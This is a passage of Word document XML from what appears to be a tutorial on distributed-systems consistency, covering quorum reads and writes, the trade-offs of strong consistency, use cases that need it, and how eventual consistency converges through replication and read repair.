    <w:p w14:paraId="2D27CACE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>W + R &gt; N (2 + 2 &gt; 3) → at least 1 node in the read set received the latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C1A00" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Guaranteed to see latest write in the read quorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E51B0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Cost of Strong Consistency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88"/>
        <w:gridCol w:w="5552"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="20FA2A1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B07EB1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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F91727" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="300B8E7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2E951E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Write latency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1B8007" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Higher (must wait for replicas/quorum)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="6A313BC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656A3C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Availability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A95511" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Lower (blocked if quorum unreachable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="3233C05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CF0985" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Throughput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AD376B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Lower (coordination overhead per write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="0E8DF0A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66937D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Network partition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34D9A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Writes REFUSE if quorum can't be reached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="76CF529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56C1A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Cross-region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4F6B2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Very expensive (adds 50–200ms per write for sync)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA17D4D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The availability sacrifice in detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705096DC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB87659" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>3-node cluster (Raft):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A11B0F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  All 3 healthy: works normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097E969" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1 node down: still works (2/3 majority available).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE24E9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2 nodes down: WRITES REFUSED (no majority). System is UNAVAILABLE for writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEC56A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551827F5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>The system CHOOSES to be unavailable rather than risk inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1C18A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Where Strong Consistency Is Required</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766"/>
        <w:gridCol w:w="5584"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2466763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2A9551" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case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AEF128" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why Strong Is Needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="72BEEC1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D28217" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Bank account balance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D558DC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Can't show $500 then allow withdrawal of $500 twice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="66114B0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73945C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Inventory count (checkout)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0F3FD9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Can't sell the last item to two customers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="1CD90D4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7884FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Distributed locks / leader election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92CD40" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Two leaders = split-brain catastrophe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="705C055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E0493E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Username/email uniqueness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66BC8C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Can't create duplicate usernames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="25433CF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4613E8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Seat reservation (flights, events)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766666" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Can't sell same seat twice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2A6D88B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865E0B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Access control decisions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D29A13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Revoked access must take effect immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="33DBF3A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22CF10" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Sequence number generation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6E8473" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Must be globally unique and ordered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="181F89F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="4B3FE1CD">
          <v:rect id="_x0000_i6038" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC8DF8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Eventual Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF1046" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B803B93" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eventual consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> If no new writes occur, all replicas will EVENTUALLY converge to the same value. At any given moment during normal operation, different replicas may return different values for the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A50B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C766B6C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Formal guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603CEE6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Given sufficient time with no new writes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B251E07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  all replicas will reach the same state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FDCF87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F57D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "Sufficient time" is NOT bounded by the specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9BF39" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  In practice: milliseconds to seconds (same DC), seconds to minutes (cross-region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719F208" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this feels like to the application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966EE5A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2DD8C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time → ──────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089F816" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client A: write(X=5)──ACK (fast! just wrote to local node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF2EA0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client B:                   read(X)─→ returns 3 (OLD value! stale!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC604E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client B:                              read(X)─→ returns 3 (still stale...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7624E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client B:                                         read(X)─→ returns 5 (finally converged!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B833F9A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="452BB4C3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The "eventually" window: time from write ACK to all replicas converging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2710F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Could be 10ms. Could be 10 seconds. Could be longer under degraded conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16782C96" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 How Eventual Consistency Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B532BB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asynchronous replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFFDCA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40781C14" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write to primary → immediately ACK to client → replicate in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA021B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="788FB3A6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Primary: write(X=5) → ACK to client (1ms — local write only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBF272" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Background: primary sends X=5 to Replica 1 (arrives 50ms later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0E517" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Background: primary sends X=5 to Replica 2 (arrives 52ms later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34218FDA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="069878A3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>During those 50ms: reading from Replica 1 returns OLD value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258C1E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>After 50ms: Replica 1 has X=5 (converged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213C011" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leaderless with quorum relaxation (W=1, R=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC1D67" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0A7FF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>N=3, W=1, R=1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F9C897" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Write to 1 node → ACK. Background gossip/anti-entropy syncs other nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13911283" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Read from 1 node → might get stale data (since write might be on a different node).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FF445" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACADC40" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Eventually: all nodes get the update (via read repair, anti-entropy, or gossip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43704D47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Convergence Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46518851" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How do eventually consistent systems actually converge?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E75801" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Read repair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627EA45" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44530C9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client reads from 3 nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117E20A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 1: X=5, version=7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C476EE7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 2: X=3, version=5  ← stale!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B766284" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 3: X=5, version=7</w:t>
      </w:r>
    </w:p>
